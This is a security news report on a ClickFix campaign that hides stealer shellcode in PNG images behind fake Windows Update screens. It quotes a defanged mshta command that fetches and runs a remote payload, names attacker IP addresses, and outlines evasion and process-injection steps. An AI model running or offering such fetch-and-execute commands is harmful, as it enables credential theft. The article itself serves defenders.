Cybersecurity researchers at Huntress have uncovered a sophisticated ClickFix campaign that leverages steganography to conceal malicious code within PNG images disguised as Windows Update screens.
The attack chain delivers multiple variants of information-stealing malware, including LummaC2 and Rhadamanthys, through a deceptive social engineering technique that tricks users into executing commands via the Windows Run prompt.
ClickFix represents a growing threat vector in the cybercriminal arsenal, exploiting user trust in familiar Windows interface elements.
The campaign begins with convincing fake Windows Update screens that display realistic “Working on updates” animations in full-screen mode.
Once the phony update completes, users are prompted to follow a simple but malicious instruction: open the Run prompt using Win+R, then paste and execute a pre-copied command using Ctrl+V.
The attack unfolds across five distinct stages, each layer adding obfuscation to evade detection.
The initial stage employs mshta.exe to execute JScript code that downloads a PowerShell loader from a remote server.
This second stage contains extensive junk code designed to confuse automated analysis, but beneath the noise lies a dynamically decrypted .NET assembly that establishes the foundation for the attack’s most innovative component.
The third stage introduces the steganographic loader a .NET assembly that extracts shellcode hidden within encrypted PNG image files.
Rather than appending malicious data to files, attackers encode executable code directly into the pixel data of PNG images using specific color channels.
Final JavaScript payload is not obfuscated. The plaintext command, mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz.
The custom steganography algorithm targets the red channel of BGRA pixel data, extracting shellcode by XORing calculated values with the red channel bytes.
This approach represents a significant technical evolution in malware delivery. By embedding payload data within legitimate-appearing image files, attackers bypass traditional file signature detection and complicate forensic analysis.
The shellcode extraction process involves accessing the bitmap’s raw pixel data through system memory, calculating stride offsets to account for row padding, and reconstructing the encrypted payload byte-by-byte from individual color channels.
Donut-Packed Final Payload
Once extracted, the shellcode is injected into the explorer.exe process through a fourth-stage .NET assembly that performs standard process injection techniques.
This stage dynamically compiles C# source code at runtime, allocates executable memory within the target process, and creates a remote thread to execute the injected payload.
The final stage shellcode is packed using Donut, a legitimate shellcode packer frequently abused by threat actors. Analysis reveals the unpacked final payload to be either LummaC2 or Rhadamanthys stealer, depending on campaign variant.
Since early October 2025, Huntress tracked multiple attack clusters associated with IP address 141.98.80.175, which hosted both initial MSHTA stages and PowerShell loaders.
Notably, the threat actor employs hex-encoded IP octets in mshta commands (appearing as 141.0×62.80.175) to evade string-based detection.
The campaign continues despite November’s Operation Endgame law enforcement takedowns targeting Rhadamanthys infrastructure.
Organizations should prioritize user awareness training to identify ClickFix social engineering tactics.
Technical controls include turning off the Windows Run prompt via Registry or Group Policy, implementing application whitelisting to restrict mshta.exe execution, and monitoring for suspicious .NET assembly loading patterns.
Endpoint detection and response solutions should focus on detecting dynamic code compilation and reflective assembly loading techniques.
The campaign demonstrates how steganography, multi-stage execution chains, and social engineering combine to create formidable threats that challenge traditional security defenses.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.